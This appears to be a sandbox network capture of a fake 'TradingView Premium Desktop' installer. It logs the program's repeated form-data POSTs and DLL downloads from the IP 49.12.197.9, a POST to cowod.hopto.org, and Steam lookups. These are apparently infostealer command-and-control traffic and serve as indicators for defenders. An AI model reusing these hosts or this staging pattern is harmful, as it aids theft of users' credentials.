                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6321
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0228b1ce69541-LHR
                                        • [US]
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6321
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0228bfdc69541-LHR
                                        • [US]
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 156
                                          Server: cloudflare
                                          CF-RAY: 8ce021b30a835327-LHR
                                        • [US]
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 10
                                          Server: cloudflare
                                          CF-RAY: 8ce0228cbc185327-LHR
                                        • [US]
                                          GET
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 510
                                          Connection: keep-alive
                                          Last-Modified: Thu, 03 Oct 2024 18:47:25 GMT
                                          Expires: Thu, 10 Oct 2024 18:47:24 GMT
                                          Etag: "d859838c13fcdd995abf47dc8580cac76787ee82"
                                          Cache-Control: max-age=604034,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 485
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b48f5476d5-LHR
                                        • [US]
                                          GET
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 510
                                          Connection: keep-alive
                                          Last-Modified: Thu, 03 Oct 2024 18:47:25 GMT
                                          Expires: Thu, 10 Oct 2024 18:47:24 GMT
                                          Etag: "d859838c13fcdd995abf47dc8580cac76787ee82"
                                          Cache-Control: max-age=604034,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 485
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b4efea76d5-LHR
                                        • [US]
                                          GET
                                          http://crl.comodoca.com/COMODOCodeSigningCA2.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /COMODOCodeSigningCA2.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/pkix-crl
                                          Content-Length: 75316
                                          Connection: keep-alive
                                          Last-Modified: Sat, 05 Oct 2024 01:39:17 GMT
                                          Expires: Sat, 12 Oct 2024 01:39:17 GMT
                                          Etag: "17c27a092b63b8718147add665dbd85cd3700d6f"
                                          Cache-Control: max-age=599909,s-maxage=3600,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 2927
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b61fe06329-LHR
                                        • [DE]
                                          GET
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:23:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJK
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 256
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 332
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBA
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 4817
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          GET
                                          https://49.12.197.9/sqlp.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /sqlp.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:04 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 2459136
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:04 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 437
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 437
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • [DE]
                                          GET
                                          https://49.12.197.9/freebl3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /freebl3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:09 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 685392
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:09 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • [DE]
                                          GET
                                          https://49.12.197.9/mozglue.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /mozglue.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:10 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 608080
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:10 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/msvcp140.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /msvcp140.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:12 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 450024
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:12 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/softokn3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /softokn3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:12 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 257872
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:12 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/vcruntime140.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /vcruntime140.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:14 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 80880
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:14 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/nss3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /nss3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:14 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 2046288
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:14 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-ru
                                          POST
                                          http://cowod.hopto.org/
                                          Remote address:
                                          45.132.206.251:80
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----FHIDAKFIJJKJJJKEBKJE
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: cowod.hopto.org
                                          Content-Length: 2005
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.124.170.33
                                        • flag-us
                                          DNS
                                          33.170.124.104.in-addr.arpa
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          33.170.124.104.in-addr.arpa
                                          IN PTR
                                          Response
                                          33.170.124.104.in-addr.arpa
                                          IN PTR
                                          a104-124-170-33deploystaticakamaitechnologiescom
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.82.234.109
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6446
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0259869bc9601-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6446
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce025990a799601-LHR
                                        • flag-us
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 135
                                          Server: cloudflare
                                          CF-RAY: 8ce02599cf1479ad-LHR
                                        • 172.67.154.80:443
                                          https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
                                          tls, http2
                                          chrome.exe
                                          5.0MB
                                          144.2MB
                                          87977
                                          103362

                                          HTTP Request

                                          GET https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip

                                          HTTP Response

                                          200
                                        • 172.67.154.80:443
                                          coincapy.com
                                          tls, http2
                                          chrome.exe
                                          943 B
                                          3.1kB
                                          8
                                          6
                                        • 104.18.38.233:80
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          http
                                          1.8kB
                                          4.3kB
                                          13
                                          9

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200
                                        • 104.18.38.233:80
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          http
                                          650 B
                                          587 B
                                          8
                                          5

                                          HTTP Request

                                          GET http://crl.usertrust.com/AddTrustExternalCARoot.crl

                                          HTTP Response

                                          404

                                          HTTP Request

                                          GET http://crl.usertrust.com/AddTrustExternalCARoot.crl

                                          HTTP Response

                                          404
                                        • 104.18.38.233:80
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          http
                                          827 B
                                          2.3kB
                                          7
                                          5

                                          HTTP Request

                                          GET http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO

                                          HTTP Response

                                          200
                                        • 104.18.38.233:80
                                          http://crl.comodoca.com/COMODOCodeSigningCA2.crl
                                          http
                                          2.7kB
                                          78.2kB
                                          46
                                          59

                                          HTTP Request

                                          GET http://crl.comodoca.com/COMODOCodeSigningCA2.crl

                                          HTTP Response

                                          200
                                        • 104.82.234.109:443
                                          steamcommunity.com
                                          tls
                                          TradingView Premium Desktop.exe
                                          2.6kB
                                          42.9kB
                                          41
                                          37
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.1kB
                                          2.8kB
                                          13
                                          9

                                          HTTP Request

                                          GET https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.4kB
                                          622 B
                                          10
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.9kB
                                          2.2kB
                                          11
                                          7

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
